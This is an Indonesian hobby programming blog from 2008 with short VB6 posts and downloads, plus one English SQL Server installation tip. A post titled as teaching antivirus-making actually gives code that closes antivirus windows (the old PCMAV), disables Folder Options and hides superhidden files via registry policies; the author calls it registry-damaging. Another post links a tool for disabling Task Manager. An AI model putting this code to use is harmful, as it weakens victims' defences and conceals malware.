Sabtu, 27 Desember 2008

Program SMS Gateway

. Sabtu, 27 Desember 2008
5 Command

Hi....!! cemuanya....!! zumpa lagi dengan sobi ...Go Blog...!!! he....he... bukan brarti sobinya yang Goblog yach..he...he... tapi klo di lihat sihch emang rada..Go....Blog. nih ane punya VB source untuk program SMS Gateway...!!! dah dengerkan...!!! sms gateway ini sih sudah lama tapi bagi temen-temn yang mau di jadikan bahan pelajaran g' da salahnya di download...!!! n siapa tau bisa cerita-cerita...!!! n bisa di kembangin...maklum blazar gitcu lo.........!!h..
eh...!! klo di kembangkan zanganlupa kasi tau sobi yach...!!

sobi kan pengen belajar juga..!! biar g go Bolg..!!!

Nich...!! linknya..!!! silahkan di download..!!!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >> [download] < - - - -


Disable Task Manager and keyboard window

0 Command

Hai .....teman- teman semua.. Jumpa lagi sama sobi go Blog..!!, kali ini kita akan belajar bagai mana cara menonaktifkan fungsi task Manager pada windows Xp dengan menggunakan VB. 6. biasanya fungsi ini sering kita temukan pada sistem Program billing di warnet..!! pengen tau caranya..!! makanye simak aza yach..!! di sini juga di sertai dengan file demo..!! dari fungsi ini..!!!

yach..!! program ini tak ambil dari Vb bego..!!

Klo mau langsung aza download yach..!!!:

- - - - - - - - - - -- - - - - - - - - -- - - - -- - - - -- - - -- - - -- - - -- - - - - -- - - - > [Download] < - - - - -


SQL Server 2008 Install: Changing Install Path When It's Defaulted And Read Only

0 Command

I'm still alive! Incase it seems this blog has gone to sleep mode again, it has. Okay, so I messed up my SQL Server 2008 installation and had to uninstall it and then reinstall it again. SQL Server 2008 installation is a hassle sometimes. I hate to be involved with things like reinstalls that waste my time. If I learn something out of it, well and good. So I learned something out of it. I thought this reinstallation from scratch will be a good opportunity to try to transfer some much needed hard drive usage from C: to D:. I have barely 7 GB left. I'm preparing my spare hard disk to take command and control but that will take time. Till then, I'll have to make do with this present crammed up hard disk. So I start the regular SQL Server 2008 install process, pass all the setup prerequisite rules, work through the various screens till you reach the place where you expect an option to choose a custom install folder location. I am hoping to change my destination from C: to D:. So I am disappointed. The install path where you are traditionally permitted to configure is defaulted to C:\Program Files\Microsoft Sql Server\ and made read-only. I guess it had something to do with left overs from my previous uninstall or probably due to VS.Net 2008 being tied to certain SQL Server 2008 components. So I ignore it and carry on thinking "what the heck, so I busted another 1.3 GB and have around 5.7 left. Life goes on. I could use a bail out". After a few steps of configuring other setup parameters, I notice that SQL Server 2008 install gives you the install configuration file path. My brain tells me that this might be useful. So I check it out and notice so many hard drive paths. My sixth sense tells me that a small little change somewhere here can make a world of a difference. Okay, so here goes. If you've experienced a similar scenario such as mine, hate it (I'm sure there are so many of you) and don't know what to do, then read on. Simple steps: 1. Proceed as usual with SQL Server 2008 install. 2. You'll reach the part where they show you the install path. If you are disappointed that you cannot edit it, then just carry on. 3. You will eventually reach a screen that shows a summary of the configuration you customized with with the path of the ConfigurationFile.ini provided. 4. Copy this path and open up the ConfigurationFile.ini for editing 5. Search for the INSTALLSHAREDDIR value. Change whatever default path you see to whatever you want. The path I wanted was:
INSTALLSHAREDDIR="D:\Program Files\Microsoft SQL Server" (you can change it to whatever path you want from the default path (usually C:\Program Files\Microsoft SQL Server\blah blah blah)6. If you choose "Mixed Mode" as I did during the setup process, then make sure you add one more line. Search for SECURITYMODE="SQL" and add one more line right underneath it:
SAPWD="[Password]"This will be required if you specified your sa account and password. I missed it the first time and had to redo the whole thing just to make sure I get exactly what I want. 7. Save the .ini file and continue with the install. Voila! Problem solved. Trivial but a life safer for me. I saved around 1 GB for myself. I know, peanuts compared to what we get these days. But I'll scale up soon :-) I don't know if other Microsoft installs have a similar work around but having got this working right, I am guessing that there just might be a good chance.



Selasa, 23 Desember 2008

Belajar Menjadi pembuat Anti Virus

. Selasa, 23 Desember 2008
2 Command

Tentunya kita tidak ingin, komputer kita berVirus? ya kan...?!! tapi itu tidak bisa di pungkiri. apa lagi komputer tukul ("Maksudnya Untuk Umum Looooooh "). akibat colok sini-colok sana akhirnya kena deh komputer kita ma Virus.!!, sebenarnya ada cara jitu. buat ngembaliin sistem window yang sudah rusak.supaya kita tidak cape deh menginstal ulang kembali windows yang rusak. kita buat Anti virus sendiri. "keren kan..!!!". Tapi kan sulit..!! sebenarnya tidak sulit cukup memeras keringat 1 tetes dan kesabaran sedikit. di sini saya akan coba memaparkan sedikit mengenai Anti Virus Buatan sendiri. mudah-mudahan bisa membantu sedikit..!!. kita mulai aza yach..!! biar langsung pusing.

Tapi sebelum mulai kita kudu tau hal-hal apa saja yang sering di rusak dan gimana cara kerja si Virus nakal tersebut.

Hal-hal yang sering di rusak oleh si Virus Nakal. biasanya yang berbahaya untuk Virus itu sendiri..!!
ce.....ileh.. jadi analisa penaganan Virus neh..!!!
1. Windows Task Manager
2. Windows RUN
3. Dos Prompt
4. Folder Options

Menurut saya mungkin cuma itu aza. tapi kalau ada yg lain kasi tau yach..!! maklum kita gi belajar.
nah kayaknya kita harus memulihkan semua tools windows tersebut biar bisa komputer kita bisa jalan dengan lancar.
skarang kita mulai aza yach membuat Codingnya...oceh.. siap yach.

Buat sebuah project dalam Visual Basic.
jangan lupa buat sebuah form baru di lengkapi sebuah tombol aza..!!! terserah mau buat tombol apa aja. n jangan lupa kasi nama tombol tersebut oceh..!!!
ketikan coding di bawah ini dalam form :
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long 'pencari Kleas dan Window Name Suatu file
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long 'sendmessage
Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) ' penghandel flashdisk
Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long 'exit windows
Private Const WM_CLOSE = &H10 'Menentukan konstanta menutup pirus yang jalan
Dim RegRun
' buat dalam event tombol klick
FWnd = FindWindow("TMainForm", vbNullString) 'aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("TApplication", vbNullString) 'aplikasi buatan Delphi
SendMessage FWnd, WM_CLOSE, 0&, 0&

RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions", 1, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions", 1, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system

coding di atas untuk merusak registrasi, jika ingin memperbaiki silahkan di balik angkanya yach..misalnya jika 0 maka ubah menjadi 1 dan seterusnya..!!!
supaya temen-temen rajin di pelajari dulu yach kemudian di kembangkan.. oceh.. boss..!!! jangan lupa kasi tau klo ada koding terbaru...!!!


Minggu, 21 Desember 2008

Detected Flash disk whit Visual Basic 6.0

. Minggu, 21 Desember 2008
5 Command

hai... my friend. ..!! untuk permulaan kita akan buat sebuah program sederhanna. pernahkah teman-teman semua menemukan program atau software yang teregistri dengan menggunakan dongel yang berupa chip kecil mirif flash disk. di sini kita akan belajar proses kerja dari sistem dongel tersebut. mau...kan..!!...makanya pasang telinga, pasang mata....he...dan klo ada tangan yang masih kemana-mana buruan di pasang juga yach....!!. tapi sebelum ke sistem dongel kita pelajari dulu sistem kerjanya. sistem kerjanya sama dengan program yang mendeteksi sistem drive yang berupa flash disk. nah sekarang kita pelajari dulu cara mendeteksi flash disk dulu oce....h. kita mulai aja yach..

Aplikasi yang kita gunakan untuk pembuatan ini adalah Visual Basic 6.0. Kita akan melakukan pengecekan terhadap flashdisk atau removable drive ini dengan menggunakan fungsi API ?GetDriveTypeA? dari library kernel32.dll.

- Buka lah VB 6.0 dan masukkan sebuah kontrol DriveListBox dan sebuah kontrol Command Button pada form dengan properties sebagai berikut:

Buka jendela code dengan cara klik kanan pada form -> klik View Code dan ketikkan kode berikut:

Private Declare Function GetDriveType& Lib "Kernel32″ Alias "GetDriveTypeA" (ByVal nDrive As String)

Private Sub Command1_Click()
Dim i As Integer
For i = 0 To Drive1.ListCount - 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> "a" Then
MsgBox "Ada Flashdisk, yaitu ?" & Drive1.List(i)
Exit For
End If
End Sub


Pelajaran kali ini sampai di sini dulu yach...!! nanti kita lanjutkan coz ada kelas dulu. banyak mahasiswa yang nanya nih



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